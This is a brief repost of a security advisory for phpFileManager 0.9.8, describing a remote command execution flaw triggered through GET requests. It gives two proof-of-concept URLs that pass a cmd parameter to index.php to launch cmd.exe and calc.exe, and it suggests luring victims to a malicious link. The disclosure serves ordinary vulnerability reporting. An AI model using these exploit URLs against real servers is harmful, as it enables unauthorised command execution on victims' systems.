phpFileManager 0.9.8 Remote Command Execution






phpFileManager 0.9.8 Remote Command Execution







Description:


phpFileManager is a complete filesystem management tool on a single file. Features: server info, directory tree, copy/move/delete/create/rename/edit/view/chmod files and folders, tar/zip/bzip/gzip, multiple uploads, shell/exec, works on linux/windows




Features


  • server info
  • directory tree
  • copy/move/delete/create/rename/edit/view/chmod files and folders
  • tar/zip/bzip/gzip
  • multiple uploads
  • shell/exec
  • works on linux/windows

Exploits 

 PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victims browser. By getting the victim to click our malicious link or visit our malicious website.

Exploit code(s):
===============


Remote Command Execution:
-------------------------

1- call Windows cmd.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe


2- Run Windows calc.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe

 


Source from : 
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt
 


 
 
 


 

 

1 comments:

Post a Comment